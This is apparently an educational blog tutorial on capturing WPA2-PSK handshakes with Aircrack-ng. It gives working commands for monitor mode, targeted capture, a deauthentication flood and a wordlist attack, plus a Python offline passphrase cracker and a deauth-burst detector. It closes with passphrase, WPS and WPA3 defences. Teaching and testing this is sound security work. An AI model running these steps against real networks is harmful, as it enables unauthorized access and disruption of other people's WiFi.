
Understanding WPA2-PSK handshake attacks (and how to protect your WiFi)

An educational look at how tools like Aircrack-ng test WiFi security and why strong passwords (and WPA3) are critical.


A note on ethics and legality (from the author)


I am writing this guide for educational and network testing purposes only. Using these techniques on any network without explicit, written permission from the owner is illegal in most countries.


I, Shakhzhakhan Maxudbek, am demonstrating this process purely to highlight a well-known vulnerability in WPA2 and to show the importance of proper security measures. My blog, args.tech, does not condone any illegal activity.


Always ensure you are testing on a network you personally own.


Introduction: What is aircrack-ng and what is a handshake attack?


Aircrack-ng is a complete suite of tools for auditing and assessing WiFi network security. It's the gold standard for wireless penetration testers and security enthusiasts.


In this guide, I'll demonstrate one of its most common uses: attempting to capture a WPA2 4-way handshake.


What are we doing? We are not "hacking" the WiFi password in real-time. Instead, our goal is to "listen" to the wireless traffic and capture the encrypted 4-way handshake. This handshake is the short conversation that happens when a device (like your phone) connects to a WPA2-protected router.


Why does this attack work? Every WPA2-PSK handshake carries enough material to check whether a guessed passphrase is correct, and a captured handshake can simply be saved to a file. Then, using an offline attack (on our own computer, with no further traffic sent to the router), we can try to "crack" it by guessing the password. Our entire goal today is just to get that handshake file.


Step 1: Prerequisites & setup


Before you begin, you will need two things:

  1. A computer running Linux (like Ubuntu, or a specialized OS like Kali Linux).
  2. A wireless adapter that supports monitor mode and packet injection. (Most built-in laptop cards do not support this. USB adapters from Alfa, TP-Link, or Panda Wireless are popular choices).


First, let's update your system's package list:

xinit@localhost:~$ sudo apt update


Now, install the aircrack-ng suite:

xinit@localhost:~$ sudo apt install aircrack-ng -y


Step 2: Finding your target (reconnaissance)


Enable monitor mode


First, we must put our wireless adapter into "monitor mode." This allows the card to listen to all WiFi traffic in the air, not just the packets addressed to your computer.


Find the name of your wireless adapter:

xinit@localhost:~$ iwconfig

You'll see an adapter listed, usually wlan0 or wlan1.


Now, start monitor mode using airmon-ng. (Replace wlan0 with your adapter's name).

xinit@localhost:~$ sudo airmon-ng start wlan0

This command will create a new virtual interface, often named wlan0mon. This is the interface we'll use from now on.


Scan the airwaves


Now, let's scan for all nearby WiFi networks using our new monitor interface:

xinit@localhost:~$ sudo airodump-ng wlan0mon

airodump-ng will display a list of all Access Points (APs) it can see.


Look for the network you have permission to test. You need to write down two pieces of information:

  • BSSID: The MAC address of the router (e.g., 00:1A:2B:3C:4D:5E).
  • CH: The channel the network is on (e.g., 6).

Press Ctrl+C to stop the scan once you have your target's info.


Step 3: Capturing the WPA2 handshake


Focus on your target


Now we run airodump-ng again, but this time, we focus only on our target network. This makes the capture much cleaner.

  • --bssid: Sets the target router's BSSID.
  • -c: Sets the channel.
  • --write: The prefix for the output file where the captured data will be saved.


Run airodump-ng with these filters, replacing the BSSID and channel with your target's:

xinit@localhost:~$ sudo airodump-ng --bssid 00:1A:2B:3C:4D:5E -c 6 --write captured_handshake wlan0mon

airodump-ng is now listening and will create files like captured_handshake-01.cap.


Now, we wait. We need a device to connect (or re-connect) to the network. When it does, airodump-ng will "see" the handshake. You'll know you have it when this message appears in the top-right corner:

WPA handshake: 00:1A:2B:3C:4D:5E


Speeding up the process with a deauthentication attack (optional)


If you don't want to wait for a device to connect naturally, you can force a connected device to disconnect. This will cause it to immediately try to reconnect, giving us the handshake.


This is an active Denial of Service (DoS) attack.


In the airodump-ng window, look at the STATION list at the bottom. This is a list of clients (devices) connected to the router. Pick one (e.g., AA:BB:CC:DD:EE:FF).


Open a new terminal and use aireplay-ng to send deauthentication packets.

  • --deauth 10: The number of deauth packets to send.
  • -a [BSSID]: The BSSID of the Access Point (router).
  • -c [STATION]: The MAC address of the client device you are kicking off.


Send the deauthentication packets (replacing BSSID and STATION MAC):

xinit@localhost:~$ sudo aireplay-ng --deauth 10 -a 00:1A:2B:3C:4D:5E -c AA:BB:CC:DD:EE:FF wlan0mon

Watch your first airodump-ng window. Within seconds, you should see the WPA handshake: ... message appear.


Once you have the handshake, you can press Ctrl+C in both terminals.
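Because the deauthentication step is an active attack, it is also the easiest part of this whole process to spot from the defender's side. The following is an added example (not part of this post or of the Aircrack-ng suite) that parses raw 802.11 management frame headers and flags any BSSID that sends a burst of deauthentication or disassociation frames; the capture, the MAC addresses and the threshold are constructed for the example.

```python
import struct
from collections import deque

DEAUTH, DISASSOC = 0xC, 0xA   # 802.11 management frame subtypes

def parse_mgmt_frame(frame):
    """Parse the fixed MAC header of an 802.11 management frame.
    Returns (subtype, addr1, addr2, addr3, reason_code) or None for non-management frames."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc >> 2) & 0x3 != 0:              # frame type 0 = management
        return None
    subtype = (fc >> 4) & 0xF
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return subtype, addr1, addr2, addr3, reason

def detect_deauth_bursts(capture, window_s=2.0, threshold=5):
    """capture: iterable of (timestamp_seconds, raw_frame_bytes). Returns (timestamp, bssid, count)
    alerts, one per burst of more than `threshold` deauth/disassoc frames attributed to the same
    BSSID within `window_s` seconds."""
    recent, alerts = {}, []
    for ts, frame in capture:
        parsed = parse_mgmt_frame(frame)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        bssid = parsed[3]
        q = recent.setdefault(bssid, deque())
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) > threshold:
            alerts.append((ts, bssid.hex(":"), len(q)))
            q.clear()                       # one alert per burst, not one per frame
    return alerts

def make_frame(subtype, addr1, addr2, addr3, reason=7):
    """Build a minimal management frame (constructed test data, no FCS)."""
    return struct.pack("<HH", subtype << 4, 0) + addr1 + addr2 + addr3 + struct.pack("<HH", 0, reason)

# Constructed capture: a spoofed deauth flood from the AP's address to one client, then one ordinary
# deauth much later (reason 3 = station leaving) and a beacon, neither of which should alert.
AP = bytes.fromhex("001A2B3C4D5E")
STA = bytes.fromhex("AABBCCDDEEFF")
SAMPLE_CAPTURE = [(10.0 + 0.1 * i, make_frame(DEAUTH, STA, AP, AP)) for i in range(10)]
SAMPLE_CAPTURE += [(50.0, make_frame(DEAUTH, STA, AP, AP, reason=3)), (50.5, make_frame(8, b"\xff" * 6, AP, AP))]
```

Where 802.11w Protected Management Frames are enabled, clients ignore unprotected deauthentication frames, but a monitor like this still records the attempt.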


Step 4: The "crack" (the offline part)


You now have a .cap file (e.g., captured_handshake-01.cap).


This file does NOT contain the password. It contains a cryptographic proof that a client knew the password.


The "crack" is an offline dictionary attack. We use a wordlist (a giant text file with millions of potential passwords) and check each one against the handshake.


This is how the aircrack-ng tool works:

  1. It takes the first password from your wordlist (e.g., password123).
  2. It runs the same key derivation as a real router and client, using that password together with the network name (SSID) and the values seen in the handshake.
  3. It compares the result to the integrity check (the "proof") stored in your .cap file.
  4. If they match, the password is found.
  5. If not, it moves to the next password and repeats.


The command would look something like this (we won't go into detail here): aircrack-ng captured_handshake-01.cap -w /path/to/wordlist.txt
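To make that loop concrete, here is an added example (not code from this post or from aircrack-ng) that performs the same check in Python: it derives the PMK from a guessed passphrase and the SSID with PBKDF2, expands it into the PTK using the nonces and MAC addresses from the handshake, recomputes the MIC over message 2, and compares it with the captured one. The SSID, nonces, MACs, EAPOL frame body and the "captured" MIC are all constructed here, so it runs offline.

```python
import hashlib
import hmac

# All handshake material below is constructed for this example, not taken from a real capture.
SSID = b"HomeNetwork"
AP_MAC = bytes.fromhex("001A2B3C4D5E")     # BSSID noted in the airodump-ng step
STA_MAC = bytes.fromhex("AABBCCDDEEFF")    # client station
ANONCE = bytes(range(32))                  # nonce sent by the AP in message 1
SNONCE = bytes(range(32, 64))              # nonce sent by the client in message 2
# EAPOL-Key body of message 2 with its 16-byte MIC field zeroed (constructed placeholder bytes).
EAPOL_M2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(113)

def pmk_from_passphrase(passphrase, ssid):
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # The SSID acts as the salt, so a precomputed table only helps against one network name.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)

def prf512(pmk, a_mac, s_mac, anonce, snonce):
    # IEEE 802.11 PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    data = min(a_mac, s_mac) + max(a_mac, s_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]

def eapol_mic(ptk, eapol_frame):
    # KCK is the first 16 bytes of the PTK; for WPA2 with AES-CCMP the MIC is HMAC-SHA1 cut to 16 bytes.
    return hmac.new(ptk[:16], eapol_frame, hashlib.sha1).digest()[:16]

def mic_for(passphrase):
    pmk = pmk_from_passphrase(passphrase, SSID)
    ptk = prf512(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk, EAPOL_M2)

# The "captured" MIC: computed from the real passphrase so the sample is self-consistent.
REAL_PASSPHRASE = "password123"
CAPTURED_MIC = mic_for(REAL_PASSPHRASE)

def crack(wordlist, captured_mic):
    """Return the first passphrase whose recomputed MIC matches the captured one, else None.
    Each candidate costs 4096 HMAC-SHA1 rounds, so wordlist quality and passphrase length decide it."""
    for candidate in wordlist:
        if hmac.compare_digest(mic_for(candidate), captured_mic):
            return candidate
    return None

if __name__ == "__main__":
    print(crack(["letmein", "qwerty", "password123", "dragon"], CAPTURED_MIC))
```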


The success of this attack depends 100% on two factors:

  1. The quality of your wordlist.
  2. The weakness of the target's password.


How to protect your WiFi network


This is the most important part. How do you make this entire attack useless?

  1. Use a Long, Complex Passphrase. This is the single most effective defense against a handshake attack.
    • Bad: P@$$w0rd123! (This is in every wordlist).
    • Good: My-Blue-Car-Eats-Green-Grass-! (This is in no wordlist). A brute-force attack against a 20+ character passphrase made of random words would take centuries. Length is more important than complexity.
  2. Disable WPS (Wi-Fi Protected Setup). WPS is the "push-button" feature on many routers. It has a separate vulnerability (like the Pixie-Dust attack) that can allow an attacker to get your password in seconds, completely bypassing the handshake attack. Log in to your router's admin page and disable it.
  3. The Real Solution: Upgrade to WPA3. The entire attack I just described is a flaw in WPA2. The WPA3 protocol (released in 2018) fixes this. It uses a new authentication method (called SAE, or Simultaneous Authentication of Equals) that is not vulnerable to offline dictionary attacks. Even if an attacker captures a WPA3 handshake, they cannot use a wordlist to crack it.
    • Action: Check your router's settings. If it supports WPA3, enable it (often called "WPA2/WPA3" mode). Keep in mind that this mixed mode still lets older devices join with WPA2, so the long passphrase from point 1 still matters until every client supports WPA3. When buying new WiFi equipment, ensure it is "WPA3 Certified."


Conclusion


Aircrack-ng is a powerful tool for demonstrating a fundamental weakness in WPA2-PSK: the authentication handshake can be captured and attacked offline.


The primary defense against this is using a long and unpredictable passphrase (20+ characters is a great start). The ultimate solution is to move to WPA3, which completely mitigates this attack vector.
